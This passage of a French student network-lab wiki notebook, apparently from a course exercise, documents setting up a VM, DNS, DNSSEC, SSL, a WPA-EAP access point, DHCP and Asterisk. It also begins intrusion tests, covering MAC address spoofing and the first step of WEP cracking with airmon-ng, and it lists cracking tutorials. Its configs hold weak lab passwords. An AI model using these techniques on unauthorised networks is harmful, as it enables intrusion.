bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement.&lt;br /&gt;
[[Fichier:Connexioniphone.JPG|thumb|center|Connexion via smartphone]]&lt;br /&gt;
&lt;br /&gt;
==== Configuration et utilisation du PCBX ====&lt;br /&gt;
&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=JulienJoignaux&lt;br /&gt;
username=jjoignaux&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&lt;br /&gt;
&lt;br /&gt;
[6002]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=LoicDelecroix&lt;br /&gt;
username=ldelecro&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions le fichier extensions.conf&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:voipjjld.jpg|thumb|center|Appel entre 2 smartphones]]&lt;br /&gt;
&lt;br /&gt;
== Références ==&lt;br /&gt;
&lt;br /&gt;
* Crackage de la clef WEP : [http://wiki.backtrack-fr.net/index.php/Casser_une_cl%C3%A9_wep/wpa_avec_la_suite_Aircrack-ng]&lt;br /&gt;
* Cassage de mot de passe WPA-PSK : [http://www.crack-wifi.com/tutoriel-crack-wpa.php]&lt;br /&gt;
* Cryptage de données : [https://doc.ubuntu-fr.org/cryptsetup]&lt;br /&gt;
* DHCP : [https://doc.ubuntu-fr.org/isc-dhcp-server]&lt;br /&gt;
* Asterisk : [http://denisrosenkranz.com/tuto-installer-et-configurer-asterisk-sous-debian-6-et-ubuntu/]&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46348</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46348"/>
				<updated>2017-11-17T13:52:22Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
ssh username@weppes&lt;br /&gt;
ssh root@193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
